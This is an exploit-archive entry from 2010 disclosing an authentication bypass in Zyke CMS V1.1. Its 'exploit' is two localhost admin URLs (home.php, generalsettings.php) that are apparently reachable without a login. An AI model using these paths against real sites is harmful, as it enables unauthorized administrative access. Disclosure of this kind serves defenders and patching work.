id: 12064
date: 04/29/2010
title: Zyke CMS V1.1 By pass Vulnerability
author: indoushka
cves: 

===================================
Zyke CMS V1.1 By pass Vulnerability 
===================================

========================================================================================                 
| # Title    : Zyke CMS V1.1 By pass Vulnerability          
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com/vb                                                                                                                                                                                                            
| # Script   : Powered by ZykeCMS 2010      
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : By pass 
| # Download : freewebtown.com/indoushka                                                                 
======================      Exploit By indoushka       =================================
 # Exploit  :
  
http://127.0.0.1/ZykeCMSV1.1/admin/home.php
 
http://127.0.0.1/ZykeCMSV1.1/admin/generalsettings.php



#  0day.today [2023-03-26]  #